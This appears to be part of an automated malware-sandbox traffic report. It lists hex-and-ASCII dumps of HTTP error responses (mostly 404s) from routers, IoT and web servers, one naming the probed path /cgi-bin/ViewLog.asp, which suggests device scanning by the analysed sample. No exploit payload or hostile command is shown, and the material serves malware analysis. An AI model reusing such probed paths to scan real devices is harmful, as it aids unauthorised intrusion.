3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 18 Mar 2024 08:59:11 GMTContent-Type: text/htmlContent-Length: 150Connection: closevia: CHN-GDshenzhen-CTPN1-CACHE19[0]X-CCDN-FORBID-CODE: 040000Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 11:09:29 GMTServer: App-webs/Content-Length: 195Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:59:14 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:53:22 GMTContent-Length: 1282Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3a 20 61 72 63 68 69 76 6f 20 6f 20 64 69 72 65 63 74 6f 72 69 6f 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Frame-Options:SAMEORIGINSet-Cookie:Secure; HttpOnlyConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:15 GMTServer: Apache/2.4.54 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 39 3a 31 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 2e 6c 6f 63 61 6c 64 6f 6d 61 69 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:59:15 GMTServer: Apache/2.4.54 (Debian)Content-Length: 313Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:15 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:15 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 12:59:15 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 12:59:15 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Mon, 18 Mar 2024 08:59:18 GMTServer: iCESraptureData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ZTE web server 1.0 ZTE corp 2015.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 